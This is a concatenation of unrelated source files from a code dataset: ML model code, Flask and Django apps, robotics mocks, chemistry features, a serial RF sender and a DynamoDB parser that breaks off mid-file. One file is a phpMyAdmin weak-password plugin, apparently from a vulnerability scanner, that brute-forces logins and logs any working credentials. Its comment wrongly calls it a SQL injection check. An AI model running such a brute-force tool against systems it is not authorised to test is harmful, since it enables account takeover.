wrong_cases.append("|gt:{}/pred:{}|".format(gt, pred)) wrong_cases = random.sample(wrong_cases, min(len(wrong_cases), self.cfg.batch_size//2)) self.log('val_loss', val_loss) self.log('accuracy', acc) # custom text logging 
self.logger.log_text("wrong_case", "___".join(wrong_cases), self.global_step) @torch.no_grad() def predict(self, image): dec = self(image) pred = self.tokenizer.decode(dec) return pred class CustomSwinTransformer(SwinTransformer): def __init__(self, img_size=224, *cfg, **kwcfg): super(CustomSwinTransformer, self).__init__(img_size=img_size, *cfg, **kwcfg) self.height, self.width = img_size def forward_features(self, x): x = self.patch_embed(x) x = self.pos_drop(x) x = self.layers(x) x = self.norm(x) # B L C return x class CustomARWrapper(AutoregressiveWrapper): def __init__(self, *cfg, **kwcfg): super(CustomARWrapper, self).__init__(*cfg, **kwcfg) @torch.no_grad() def generate(self, start_tokens, seq_len, eos_token=None, temperature=1., filter_logits_fn=top_k, filter_thres=0.9, **kwcfg): was_training = self.net.training num_dims = len(start_tokens.shape) if num_dims == 1: start_tokens = start_tokens[None, :] b, t = start_tokens.shape self.net.eval() out = start_tokens mask = kwcfg.pop('mask', None) if mask is None: mask = torch.full_like(out, True, dtype=torch.bool, device=out.device) for _ in range(seq_len): x = out[:, -self.max_seq_len:] mask = mask[:, -self.max_seq_len:] logits = self.net(x, mask=mask, **kwcfg)[:, -1, :] if filter_logits_fn in {top_k, top_p}: filtered_logits = filter_logits_fn(logits, thres=filter_thres) probs = F.softmax(filtered_logits / temperature, dim=-1) elif filter_logits_fn is entmax: probs = entmax(logits / temperature, alpha=ENTMAX_ALPHA, dim=-1) sample = torch.multinomial(probs, 1) out = torch.cat((out, sample), dim=-1) mask = F.pad(mask, (0, 1), value=True) if eos_token is not None and (torch.cumsum(out == eos_token, 1)[:, -1] >= 1).all(): break out = out[:, t:] if num_dims == 1: out = out.squeeze(0) self.net.train(was_training) return out
1.773438
2
server/models.py
pastgift/web-app-template-py
0
12765355
# -*- coding: utf-8 -*- import uuid import hashlib from datetime import datetime from flask import current_app, request from flask.ext.login import UserMixin, AnonymousUserMixin from werkzeug.security import generate_password_hash, check_password_hash from itsdangerous import TimedJSONWebSignatureSerializer as Serializer from server.exceptions import ValidationError from . import db, login_manager class User(db.Model): __tablename__ = 'tb_main_users' id = db.Column(db.String(64), primary_key=True) username = db.Column(db.String(64), unique=True, index=True) password_hash = db.Column(db.String(128)) name = db.Column(db.UnicodeText(64)) status = db.Column(db.String(64), default='normal') last_seen = db.Column(db.DateTime()) created_timestamp = db.Column(db.DateTime(), default=db.func.now()) updated_timestamp = db.Column(db.DateTime(), default=db.func.now(), onupdate=db.func.now()) def __init__(self, **kwargs): super(User, self).__init__(**kwargs) @property def is_active(self): return self.status == 'normal' @property def is_authenticated(self): return self.is_active @property def is_anonymous(self): return False def get_id(self): try: return unicode(self.id) except AttributeError: raise NotImplementedError("No `id` attribute - override get_id") @property def password(self): raise AttributeError('Can not get password') @password.setter def password(self, password): self.password_hash = generate_password_hash(password) def verify_password(self, password): return check_password_hash(self.password_hash, password) def is_admin(self): return self.username == current_app.config['ADMIN_USERNAME'] def ping(self): self.last_seen = datetime.utcnow() db.session.add(self) db.session.commit() def can(self, action): if self.is_admin() and action in current_app.config['ADMIN_DEFAULT_ACL_ACTIONS']: return True if UserAcl.query.filter_by(user_id=self.id, action=action).first(): return True return False def can_any(self, *actions): for action in actions: if self.can(action): return True else: return False def can_all(self, *actions): for action in actions: if not self.can(action): return False else: return True @staticmethod def new(**kwargs): kwargs['id'] = uuid.uuid4().hex return User(**kwargs) def generate_auth_token(self, expiration): s = Serializer(current_app.config['SECRET_KEY'], expires_in=expiration) return s.dumps({'id': self.id}).decode('ascii') @staticmethod def verify_auth_token(token): s = Serializer(current_app.config['SECRET_KEY']) try: data = s.loads(token) except: return None return User.query.get(data['id']) def __repr__(self): return '<User %r>' % self.username class AnonymousUser(AnonymousUserMixin): def is_admin(self): return False def can(self, *args, **kwargs): return False can_any = can can_all = can login_manager.anonymous_user = AnonymousUser @login_manager.user_loader def load_user(user_id): return User.query.get(user_id) class UserAcl(db.Model): __tablename__ = 'tb_main_user_acl' id = db.Column(db.String(64), primary_key=True) user_id = db.Column(db.String(64)) action = db.Column(db.String(128)) created_timestamp = db.Column(db.DateTime(), default=db.func.now()) updated_timestamp = db.Column(db.DateTime(), default=db.func.now(), onupdate=db.func.now()) def __init__(self, **kwargs): super(UserAcl, self).__init__(**kwargs) @staticmethod def new(**kwargs): kwargs['id'] = uuid.uuid4().hex return UserAcl(**kwargs) def __repr__(self): return '<UserAcl %r, %r>' % (self.user_id, self.action) class OperationRecord(db.Model): __tablename__ = 'tb_main_operation_records' id = 
db.Column(db.String(64), primary_key=True) user_id = db.Column(db.String(64)) operation_note = db.Column(db.Text()) created_timestamp = db.Column(db.DateTime(), default=db.func.now()) updated_timestamp = db.Column(db.DateTime(), default=db.func.now(), onupdate=db.func.now()) def __init__(self, **kwargs): super(OperationRecord, self).__init__(**kwargs) @staticmethod def new(**kwargs): kwargs['id'] = uuid.uuid4().hex return OperationRecord(**kwargs) def __repr__(self): return '<OperationRecord %r>' % self.user_id
1.726563
2
books/templatetags/books.py
Nuurek/HomeLibrary
0
12765483
from django.template import Library from django.forms.models import model_to_dict from django.contrib.auth.models import User from books.models import Book from libraries.models import BookCopy, Lending, Reading register = Library() @register.inclusion_tag('books/tags/book_tag.html') def render_book(book: Book): return model_to_dict(book) @register.inclusion_tag('books/tags/google_book_tag.html') def render_google_book(book: dict): return book @register.inclusion_tag('books/tags/book_copy_tag.html') def render_book_copy(copy: BookCopy, user: User, **kwargs): context = book_copy_to_dict(copy) clean = kwargs.get('clean', False) context['clean'] = clean if clean: context['only_description'] = True else: context['only_description'] = kwargs.get('only_description', False) library = kwargs.get('library') context['user_library'] = user.userprofile.home_library.pk context['is_owner'] = library == user.userprofile.home_library is_book_owner = copy.library == user.userprofile.home_library context['is_book_owner'] = is_book_owner context['is_read'] = Reading.objects.filter(copy=copy) is_kept_by_user = copy.is_kept_by(user.userprofile) context['is_kept_by_user'] = is_kept_by_user context['is_read'] = Reading.objects.filter(copy=copy, reader=user.userprofile, is_completed=False).exists() if is_kept_by_user: context['is_read'] = Reading.objects.filter(copy=copy, reader=user.userprofile, is_completed=False).exists() try: lending = copy.lending_set.get(is_completed=False) context['lending'] = lending library = kwargs.get('library') if library == lending.borrower: context['borrowed'] = True context['lender'] = copy.library.owner.user.username if copy.library else None else: context['lent'] = True context['borrower'] = lending.borrower.owner.user.username if lending.borrower else None context['is_return_available'] = is_book_owner or (lending.borrower and user == lending.borrower.owner.user) except Lending.DoesNotExist: context['is_lending_available'] = is_book_owner return context def book_copy_to_dict(copy: BookCopy): book_dict = model_to_dict(copy.book) book_dict.pop('id') copy_dict = model_to_dict(copy) copy_dict.update(book_dict) return copy_dict
1.601563
2
pyreach/mock/color_camera_mock.py
google-research/pyreach
13
12765611
# Copyright 2021 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Mock PyReach Color Camera.""" from typing import Callable, Optional import numpy as np # type: ignore from pyreach import calibration as cal from pyreach import color_camera from pyreach import core from pyreach.mock import calibration_mock as cal_mock class ColorFrameMock(color_camera.ColorFrame): """A single color camera frame taken at a specific time. Attributes: time: The time in seconds of the frame since 1970. sequence: The sequence number of the color frame. device_type: The JSON device type string. device_name: The JSON device name string. color_image: A color image as a (DX,DY,3) array of uint8's. calibration: The calibration when the image is captured. """ def __init__(self, time: float, sequence: int, device_type: str, device_name: str, color_image: np.ndarray, calibration: Optional[cal.Calibration]) -> None: """Initialize a MockColorFrame.""" self._time: float = time self._sequence = sequence self._device_type: str = device_type self._device_name: str = device_name self._color_image: np.ndarray = color_image self._calibration: Optional[cal.Calibration] = calibration @property def time(self) -> float: """Return timestamp of the ColorFrame.""" return self._time @property def sequence(self) -> int: """Sequence number of the ColorFrame.""" return self._sequence @property def device_type(self) -> str: """Return the Reach device type.""" return self._device_type @property def device_name(self) -> str: """Return the Reach device name.""" return self._device_name @property def color_image(self) -> np.ndarray: """Return the color image as a (DX,DY,3).""" return self._color_image @property def calibration(self) -> Optional[cal.Calibration]: """Return the Calibration for for the ColorFrame.""" return self._calibration def pose(self) -> Optional[core.Pose]: """Return the pose of the camera when the image is taken.""" raise NotImplementedError class ColorCameraMock(color_camera.ColorCamera): """Mock ColorCamera class.""" def __init__(self) -> None: """Init a MockColorCamera.""" pass def add_update_callback( self, callback: Callable[[color_camera.ColorFrame], bool], finished_callback: Optional[Callable[[], None]] = None) -> Callable[[], None]: """Add a callback function to be invoked when a new frame is available. Args: callback: A function to be invoked when a new frame is available. Returns False to continue receiving new images. Returns True to stop further update. finished_callback: Optional callback, called when the callback is stopped or if the camera is closed. Returns: A function that when called stops the callbacks. """ raise NotImplementedError def start_streaming(self, request_period: float = 0.1) -> None: """Start streaming of camera images. Args: request_period: The number of seconds between frames. Defaults to .1 second between frames. 
""" pass def stop_streaming(self) -> None: """Stop streaming camera images.""" raise NotImplementedError def supports_tagged_request(self) -> bool: """Return True if tagged requests are supported.""" raise NotImplementedError def enable_tagged_request(self) -> None: """Enable tagged requests.""" raise NotImplementedError def disable_tagged_request(self) -> None: """Disable tagged requests.""" raise NotImplementedError def image(self) -> Optional[color_camera.ColorFrame]: """Return the latest image if it exists.""" color_frame_mock: ColorFrameMock = ColorFrameMock( 1.0, 0, "device_type", "device_name", np.zeros((3, 5, 3), dtype=np.uint8), cal_mock.CalibrationMock("device_type", "device_name", "color_camera_link_name")) color_frame: color_camera.ColorFrame = color_frame_mock return color_frame def fetch_image(self, timeout: float = 15.0) -> Optional[color_camera.ColorFrame]: """Fetch a new image or possibly times out. Args: timeout: The optional amount of time to wait for a camera frame. If not specified, 15 seconds is the default timeout. Returns: Returns the color image or None for a timeout. """ raise NotImplementedError def async_fetch_image(self, callback: Optional[Callable[[color_camera.ColorFrame], None]] = None, error_callback: Optional[Callable[[core.PyReachStatus], None]] = None, timeout: float = 30) -> None: """Fetch a new image asynchronously. The callback function will be invoked when new image is available. Args: callback: A callback function that is called when an image arrives. If the camera fails to load an image, the callback is not called. error_callback: Optional callback that is called if there is an error. timeout: Timeout for the fetch, defaults to 30 seconds. """ raise NotImplementedError @property def pose(self) -> Optional[core.Pose]: """Return the latest pose of the camera.""" raise NotImplementedError
1.875
2
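Illustrative use of the mock camera above (assumes the pyreach package and these mock modules are importable); image() returns a fixed all-zero 3x5 frame wrapped in a ColorFrameMock with a mock calibration attached.

camera = ColorCameraMock()
frame = camera.image()
print(frame.color_image.shape)           # (3, 5, 3)
print(frame.device_type, frame.device_name)
print(frame.time, frame.sequence)        # 1.0 0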
hello.py
sandipsahajoy/CMPUT404-Lab3
0
12765739
<gh_stars>0 #!/usr/bin/env python3 import os, json ### Print python env variables as plain text # print("Content-Type: text/plain") # print() # print(os.environ) ### Print python env variables as json # print("Content-Type: application/json") # print() # print(json.dumps(dict(os.environ), indent=2)) ### Print query parameter data in html # print("Content-Type:text/html") # print() # print("<p>QUERY_STRING: {}</p>".format(os.environ['QUERY_STRING'])) ### Print user's browser parameter data in html print("Content-Type:text/html") print() print("<p>HTTP_USER_AGENT: {}</p>".format(os.environ['HTTP_USER_AGENT']))
1.398438
1
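One way (not prescribed by the lab) to exercise a CGI script like this locally is the standard library's CGI-capable HTTP server, which serves executable scripts placed under ./cgi-bin:

from http.server import CGIHTTPRequestHandler, HTTPServer

# hypothetical layout: ./cgi-bin/hello.py, marked executable (chmod +x)
server = HTTPServer(("127.0.0.1", 8000), CGIHTTPRequestHandler)
server.serve_forever()  # then visit http://127.0.0.1:8000/cgi-bin/hello.py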
Web_Server/webapps/bemoss_applications/migrations/0001_initial.py
ajfar-bem/wisebldg
0
12765867
# -*- coding: utf-8 -*- # Generated by Django 1.10 on 2017-07-17 19:38 from __future__ import unicode_literals import django.contrib.postgres.fields.jsonb from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ('buildinginfos', '0001_initial'), ] operations = [ migrations.CreateModel( name='ApplicationRegistered', fields=[ ('application_id', models.AutoField(primary_key=True, serialize=False)), ('app_name', models.CharField(blank=True, max_length=50, null=True)), ('description', models.CharField(blank=True, max_length=1000, null=True)), ('app_folder', models.CharField(max_length=200)), ('registered_time', models.DateTimeField()), ], options={ 'db_table': 'application_registered', }, ), migrations.CreateModel( name='ApplicationRunning', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('start_time', models.DateTimeField()), ('app_agent_id', models.CharField(max_length=50)), ('status', models.CharField(blank=True, max_length=20, null=True)), ('app_data', django.contrib.postgres.fields.jsonb.JSONField(default={})), ('app_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bemoss_applications.ApplicationRegistered')), ('building', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='buildinginfos.BuildingInfo')), ('zone', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='buildinginfos.ZoneInfo')), ], options={ 'db_table': 'application_running', }, ), ]
0.84375
1
flora_tools/utilities.py
Atokulus/flora-tools
1
12765995
<filename>flora_tools/utilities.py import random import string import numpy as np def get_random_text(length=None, max_length=254): if length is None: length = np.random.randint(-1, max_length + 1) if length < 0: return None else: text = ''.join(random.choices(string.ascii_letters + string.ascii_uppercase + string.digits, k=(length - 1))) return text def get_edges(wave): wave_min = np.amin(wave) wave_max = np.amax(wave) digital = np.digitize(wave, [(wave_min + wave_max) / 2.0]) diff = np.diff(digital) indices = np.argwhere(diff) return indices
1.84375
2
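Illustrative use of the two helpers above (assumes they are importable, e.g. from flora_tools.utilities import get_random_text, get_edges):

import numpy as np

print(get_random_text(length=16))        # random ASCII string of length - 1 = 15 characters

wave = np.concatenate([np.zeros(50), np.ones(50), np.zeros(50)])
print(get_edges(wave))                   # indices where the digitized waveform changes level: [[49] [99]]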
jobboard/forms.py
YarinBou/SJMaster
1
12766123
from django import forms from jobboard.models import Job class FormControl(forms.ModelForm): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) for form_field in self.visible_fields(): form_field.field.widget.attrs['class'] = 'form-control' class CreateNewJobForm(FormControl): class Meta: model = Job fields = ['title', 'job_type', 'major', 'work_from', 'description', 'city', 'address', 'title_keywords'] widgets = {'description': forms.Textarea(attrs={'rows': '5'}), }
1.445313
1
examples/beam_simple_rhino.py
franaudo/fea
0
12766251
from math import pi from compas_fea.cad import rhino from compas_fea.structure import CircularSection from compas_fea.structure import ElasticIsotropic from compas_fea.structure import ElementProperties as Properties from compas_fea.structure import GeneralDisplacement from compas_fea.structure import GeneralStep from compas_fea.structure import PinnedDisplacement from compas_fea.structure import PointLoad from compas_fea.structure import Structure # Author(s): <NAME> (github.com/andrewliew) # Structure mdl = Structure(name='beam_simple', path='C:/Temp/') # Elements network = rhino.network_from_lines(layer='elset_lines') mdl.add_nodes_elements_from_network(network=network, element_type='BeamElement', elset='elset_lines', axes={'ex': [0, -1, 0]}) # Sets rhino.add_sets_from_layers(mdl, layers=['nset_left', 'nset_right', 'nset_weights']) # Materials mdl.add(ElasticIsotropic(name='mat_elastic', E=20*10**9, v=0.3, p=1500)) # Sections _, ekeys, L, Lt = rhino.ordered_network(mdl, network=network, layer='nset_left') for i, Li in zip(ekeys, L): ri = (1 + Li / Lt) * 0.020 sname = 'sec_{0}'.format(i) mdl.add(CircularSection(name=sname, r=ri)) mdl.add(Properties(name='ep_{0}'.format(i), material='mat_elastic', section=sname, elements=[i])) # Displacements mdl.add([ PinnedDisplacement(name='disp_left', nodes='nset_left'), GeneralDisplacement(name='disp_right', nodes='nset_right', y=0, z=0, xx=0), GeneralDisplacement(name='disp_rotate', nodes='nset_left', yy=30*pi/180), ]) # Loads mdl.add(PointLoad(name='load_weights', nodes='nset_weights', z=-100)) # Steps mdl.add([ GeneralStep(name='step_bc', displacements=['disp_left', 'disp_right']), GeneralStep(name='step_load', loads='load_weights', displacements='disp_rotate'), ]) mdl.steps_order = ['step_bc', 'step_load'] # Summary mdl.summary() # Run mdl.analyse_and_extract(software='opensees', fields=['u', 'ur', 'sf', 'sm']) rhino.plot_data(mdl, step='step_load', field='um', radius=0.01, cbar_size=0.3) rhino.plot_data(mdl, step='step_load', field='sf1', radius=0.01, cbar_size=0.3) rhino.plot_data(mdl, step='step_load', field='sf2', radius=0.01, cbar_size=0.3) rhino.plot_data(mdl, step='step_load', field='sm1', radius=0.01, cbar_size=0.3)
1.640625
2
chemmltoolkit/features/atomFeatures.py
Andy-Wilkinson/ChemMLToolk
1
12766379
<reponame>Andy-Wilkinson/ChemMLToolk from os import path from rdkit.Chem import Mol from chemmltoolkit.features.decorators import tokenizable_feature from rdkit.Chem import Atom from rdkit.Chem import AllChem from rdkit.Chem import ChiralType from rdkit.Chem import HybridizationType from rdkit.Chem import rdCIPLabeler class _ChemicalFeatureGenerator(): _instance = None def __new__(cls): if cls._instance is None: cls._instance = super( _ChemicalFeatureGenerator, cls).__new__(cls) from rdkit import RDConfig from rdkit.Chem import ChemicalFeatures fdef_path = path.join(RDConfig.RDDataDir, 'BaseFeatures.fdef') cls._instance.feature_factory = \ ChemicalFeatures.BuildFeatureFactory(fdef_path) return cls._instance def assign_features(self, mol: Mol): for atom in mol.GetAtoms(): atom.SetProp('_Feature_Acceptor', '0') atom.SetProp('_Feature_Donor', '0') features = self.feature_factory.GetFeaturesForMol(mol) for feature in features: family = feature.GetFamily() for atom_idx in feature.GetAtomIds(): atom = mol.GetAtomWithIdx(atom_idx) if family == 'Acceptor': atom.SetProp('_Feature_Acceptor', '1') elif family == 'Donor': atom.SetProp('_Feature_Donor', '1') def atomic_number(atom: Atom) -> int: """Atomic number (int). """ return atom.GetAtomicNum() def atomic_mass(atom: Atom) -> float: """Atomic mass (float). """ return atom.GetMass() def charge(atom: Atom) -> int: """Formal charge (int). """ return atom.GetFormalCharge() def charge_gasteiger(atom: Atom) -> float: """Gasteiger partial charge (float). """ if not atom.HasProp('_GasteigerCharge'): mol = atom.GetOwningMol() AllChem.ComputeGasteigerCharges(mol) return atom.GetDoubleProp('_GasteigerCharge') def charge_gasteiger_h(atom: Atom) -> float: """Gasteiger partial charge for implicit hydrogens (float). """ if not atom.HasProp('_GasteigerHCharge'): mol = atom.GetOwningMol() AllChem.ComputeGasteigerCharges(mol) return atom.GetDoubleProp('_GasteigerHCharge') @tokenizable_feature([ChiralType.CHI_UNSPECIFIED, ChiralType.CHI_TETRAHEDRAL_CW, ChiralType.CHI_TETRAHEDRAL_CCW, ChiralType.CHI_OTHER]) def chiral_tag(atom: Atom) -> ChiralType: """Chirality of the atom (ChiralType) """ return atom.GetChiralTag() def degree(atom: Atom) -> int: """Number of directly bonded neighbours (int). """ return atom.GetDegree() @tokenizable_feature([HybridizationType.SP, HybridizationType.SP2, HybridizationType.SP3, HybridizationType.SP3D, HybridizationType.SP3D2]) def hybridization(atom: Atom) -> HybridizationType: """Hybridisation (HybridizationType). """ return atom.GetHybridization() def hydrogens(atom: Atom) -> int: """Total number of hydrogen atoms (int). """ return atom.GetTotalNumHs() def index(atom: Atom) -> int: """Index within the parent molecule (int). """ return atom.GetIdx() def is_aromatic(atom: Atom) -> int: """If the atom is aromatic (0 or 1). """ return int(atom.GetIsAromatic()) def is_hbond_acceptor(atom: Atom) -> int: """If the atom is a hydrogen bond acceptor (0 or 1). """ if not atom.HasProp('_Feature_Acceptor'): mol = atom.GetOwningMol() _ChemicalFeatureGenerator().assign_features(mol) return atom.GetIntProp('_Feature_Acceptor') def is_hbond_donor(atom: Atom) -> int: """If the atom is a hydrogen bond donor (0 or 1). """ if not atom.HasProp('_Feature_Donor'): mol = atom.GetOwningMol() _ChemicalFeatureGenerator().assign_features(mol) return atom.GetIntProp('_Feature_Donor') def is_ring(atom: Atom) -> int: """If the atom is is in a ring (0 or 1). 
""" return int(atom.IsInRing()) def is_ringsize(ringSize: int) -> int: """If the atom is is in a ring of the specified size (0 or 1). Args: ringSize: The size of the ring. """ def _is_ringsize(atom: Atom): return int(atom.IsInRingSize(ringSize)) _is_ringsize.__name__ = f'is_ringsize({ringSize})' return _is_ringsize def isotope(atom: Atom) -> int: """Isotope (int). """ return atom.GetIsotope() def radical(atom: Atom) -> int: """Number of radical electrons (int). """ return atom.GetNumRadicalElectrons() @tokenizable_feature(['', 'R', 'S']) def stereochemistry(atom: Atom) -> str: """CIP sterochemistry label (string). """ mol = atom.GetOwningMol() if not mol.HasProp('_CIPLabelsAssigned'): rdCIPLabeler.AssignCIPLabels(mol) mol.SetProp('_CIPLabelsAssigned', '1') return atom.GetProp('_CIPCode') if atom.HasProp('_CIPCode') else '' def symbol(atom: Atom) -> str: """Atomic symbol (string). """ return atom.GetSymbol()
1.414063
1
celery_app/plugins/pluginnormal/phpmyadmin_weak_password.py
tiaotiaolong/piu
2
12766507
import requests
import re

from celery_app.utils.utils import insert_vuln_db
from celery_app.config.config import web_port_long

# Tongda OA system SQL injection vulnerability (original comment translated from Chinese)
plugin_id = 73
default_port_list = web_port_long


def get_token(url):
    result = re.findall('<input type="hidden" name="token" value="(\w+)" />',
                        requests.get(url, timeout=10).text)
    if result:
        return result[0]
    return False


def is_phpmyadmin(url):
    return 'phpMyAdmin' in requests.get(url, timeout=10).text


def check(host, port=80):
    scheme = 'https' if '443' in str(port) else 'http'
    target = '{}://{}:{}'.format(scheme, host, port)
    urls = [target, '{}/phpmyadmin/index.php'.format(target)]
    try:
        for url in urls:
            if not is_phpmyadmin(url):
                continue
            simple_passwords = ['', '<PASSWORD>', '<PASSWORD>', '<PASSWORD>', '<PASSWORD>', '!@#', '<PASSWORD>', '111', '666', '1314']
            simple_users = ['', 'root', 'test', 'admin', 'server', 'password', 'mysql', 'ceshi', 'mima', host.split('.')[0]]
            passwords = ['{}{}'.format(user, password) for user in simple_users for password in simple_passwords]
            for user in ['root', 'test', 'server', 'ceshi']:
                for pwd in passwords:
                    token = get_token(url)
                    if not token:
                        return False
                    data = {
                        "pma_username": user,
                        "pma_password": <PASSWORD>,
                        "server": 1,
                        "token": token
                    }
                    requests.packages.urllib3.disable_warnings()
                    response = requests.post(url, data, timeout=7, headers={'Cookie': "pma_lang=zh_CN"})
                    if 'login_form' in response.text:
                        continue
                    elif response.status_code == 200 and 'db_structure.php' in response.text:
                        output = "Username: {}\t Password: {}".format(user, pwd)
                        target = url
                        insert_vuln_db(host, target, output, plugin_id)
                        return True, host, target, output
    except:
        return False
    return False
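A small offline check of the token-extraction regex used by get_token above; the HTML snippet is a hand-written stand-in for a phpMyAdmin login page, so no network access is needed.

import re

sample_html = '<form>...<input type="hidden" name="token" value="abc123DEF" />...</form>'
tokens = re.findall(r'<input type="hidden" name="token" value="(\w+)" />', sample_html)
print(tokens[0] if tokens else False)   # -> abc123DEF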
1.492188
1
flask_app.py
molliewhite/mission_to_mars
0
12766635
# Get dependencies
from flask import Flask, render_template, redirect
import pymongo
import mission_to_mars
import jinja2
from jinja2 import TemplateNotFound

# Create Flask App
app = Flask(__name__)

# Connect to MongoDB
conn = "mongodb://localhost:27017"
client = pymongo.MongoClient(conn)
db = client.mars_DB


@app.route("/")
def index():
    mars = db.mars_data.find_one()
    return render_template("index.html", mars=mars)


@app.route("/scrape")
def scrape():
    mars_data = mission_to_mars.scrape()
    db.mars_data.update(
        {},
        mars_data,
        upsert=True
    )
    return redirect("http://localhost:5000/", code=302)


if __name__ == "__main__":
    app.run(debug=True)
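The /scrape route above uses the legacy pymongo Collection.update, which was removed in pymongo 4. A hedged sketch of the equivalent upsert with update_one, reusing the database and collection names from the app; it assumes a local mongod is running, and the document content is a placeholder.

import pymongo

client = pymongo.MongoClient("mongodb://localhost:27017")   # assumes a local mongod
db = client.mars_DB
mars_data = {"headline": "example", "teaser": "example"}    # placeholder scrape result
# update_one with $set and upsert=True replaces the single stored document,
# creating it if it does not exist yet.
db.mars_data.update_one({}, {"$set": mars_data}, upsert=True)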
1.359375
1
rf_command.py
glzjin/eventbridge-client-for-consumer
0
12766763
import serial
import struct

rf_channel_list = [b"\x01", b"\x02", b"\x03", b"\x04"]


def send_rf_command(config_class, channel, is_study=False):
    ser = serial.Serial(
        port=config_class.tty,
        baudrate=9600,
        parity=serial.PARITY_NONE,
        stopbits=serial.STOPBITS_ONE,
        bytesize=serial.EIGHTBITS
    )
    ser.flushInput()
    ser.flushOutput()

    if is_study:
        data = b"\xAA"
    else:
        data = b"\xBB"

    data += rf_channel_list[channel]
    data += b"\xFF"

    ser.write(data)
    ser.flushInput()
    ser.flushOutput()
    ser.close()
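A standalone look at the frame that send_rf_command writes to the serial port; no serial hardware is needed for this check, and build_frame is a hypothetical helper that mirrors the byte layout above.

rf_channel_list = [b"\x01", b"\x02", b"\x03", b"\x04"]

def build_frame(channel, is_study=False):
    # 0xAA marks a 'study' (learn) frame, 0xBB a normal send; 0xFF terminates the frame
    return (b"\xAA" if is_study else b"\xBB") + rf_channel_list[channel] + b"\xFF"

print(build_frame(2))          # b'\xbb\x03\xff'
print(build_frame(0, True))    # b'\xaa\x01\xff'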
1.875
2
decomp.py
MelyPic/labgaif
0
12766891
'''
Handle transactional file via github's labgaif/td2dot.py

Similar to integration tests inside maindecomposition but trying them "from outside file".

Yesterday I got some strange error in the union/find str but I cannot reproduce it anymore :(
It read:
    if x.parent == x:
    AttributeError: 'str' object has no attribute 'parent'
'''

from maindecomposition import decompose, stdGgraph, labGgraph, hack_items_in, hack_graph_in
from td2dot import read_graph_in
# ~ from td2dot import dump_graph  # might become necessary to track read in graph

datasetfile = 'titanic_'

graph, items = read_graph_in(datasetfile + '.td')

# make items available as global variable, necessary for Ely's code to work
# there, replace '-' and '=' in names as disallowed by dot
# means currently:
# TotalAttributesValues = [ item.replace('-', '_').replace('=', '_') for item in items ]
hack_items_in(items)

# option 1 for original labeled Gaifman graph
# ~ my_graph = labGgraph(graph, items)
# option 2 for standard Gaifman graph
my_graph = stdGgraph(graph, items)

# make my_graph available as global variable, necessary for Ely's code to work
hack_graph_in(my_graph)

# decompose it
decompose(my_graph, '2', datasetfile + '_std_decomp')
1.0625
1
dynamodb_ce/ceparser.py
QuiNovas/dynamodb-conditional-expressions
0
12767019
__all__ = ["CeParser"] from copy import deepcopy from decimal import Decimal from typing import Callable, Dict, Set, Union import simplejson as json from boto3.dynamodb.types import ( BINARY, BINARY_SET, BOOLEAN, LIST, MAP, NULL, NUMBER, NUMBER_SET, STRING, STRING_SET, Binary, TypeDeserializer, TypeSerializer, ) from sly.yacc import Parser from .celexer import CeLexer class CeTypeDeserializer(TypeDeserializer): def deserialize(self, value): if value and isinstance(value, dict): if list(value)[0] in ( BINARY, BINARY_SET, BOOLEAN, LIST, MAP, NULL, NUMBER, NUMBER_SET, STRING, STRING_SET, ): value = super().deserialize(value) else: value = {k: self.deserialize(v) for k, v in value.items()} return value.value if isinstance(value, Binary) else value _TYPE_DESERIALIZER = CeTypeDeserializer() _TYPE_SERIALIZER = TypeSerializer() Dynamo = Union[ Binary, bool, Decimal, dict, list, None, str, Set[Binary], Set[Decimal], Set[str] ] ExpressionAttributeNames = Dict[str, str] ExpressionAttributeValues = DynamoItem = Dict[str, Union[Dynamo, Dict[str, Dynamo]]] class CeParser(Parser): _expression_cache: Dict[int, Callable[[DynamoItem], bool]] = dict() def __init__( self, *, expression_attribute_names: ExpressionAttributeNames = None, expression_attribute_values: ExpressionAttributeValues = None, ): self._expression_attribute_names: ExpressionAttributeNames = dict() self._expression_attribute_values: ExpressionAttributeValues = dict() self.expression_attribute_names = expression_attribute_names or dict() self.expression_attribute_values = expression_attribute_values or dict() self._set_expression_attribute_json() super().__init__() def _set_expression_attribute_json(self) -> None: self._expression_attribute_json = json.dumps( self._expression_attribute_names, separators=(",", ":"), use_decimal=True ) + json.dumps( self._expression_attribute_values, separators=(",", ":"), use_decimal=True ) @property def expression_attribute_names(self) -> ExpressionAttributeNames: return deepcopy(self._expression_attribute_names) @expression_attribute_names.setter def expression_attribute_names( self, expression_attribute_names: ExpressionAttributeNames ) -> None: self._expression_attribute_names = ( deepcopy(expression_attribute_names) or dict() ) self._set_expression_attribute_json() @expression_attribute_names.deleter def expression_attribute_names(self) -> None: self._expression_attribute_names: ExpressionAttributeNames = dict() self._set_expression_attribute_json() @property def expression_attribute_values(self) -> ExpressionAttributeValues: return deepcopy(self._expression_attribute_values) @expression_attribute_values.setter def expression_attribute_values( self, expression_attribute_values: ExpressionAttributeValues ) -> None: self._expression_attribute_values: ExpressionAttributeValues = ( _TYPE_DESERIALIZER.deserialize(expression_attribute_values) or dict() ) self._set_expression_attribute_json() @expression_attribute_values.deleter def expression_attribute_values(self) -> None: self._expression_attribute_values: ExpressionAttributeValues = dict() self._set_expression_attribute_json() def evaluate(self, /, expression: str, item: DynamoItem) -> bool: return self.parse(expression)(item) @classmethod def flush_cache(cls) -> None: cls._expression_cache: Dict[int, Callable[[DynamoItem], bool]] = dict() def parse(self, expression: str) -> Callable[[DynamoItem], bool]: expression_hash = hash(expression + self._expression_attribute_json) if expression_hash not in self._expression_cache: compiled_expression: 
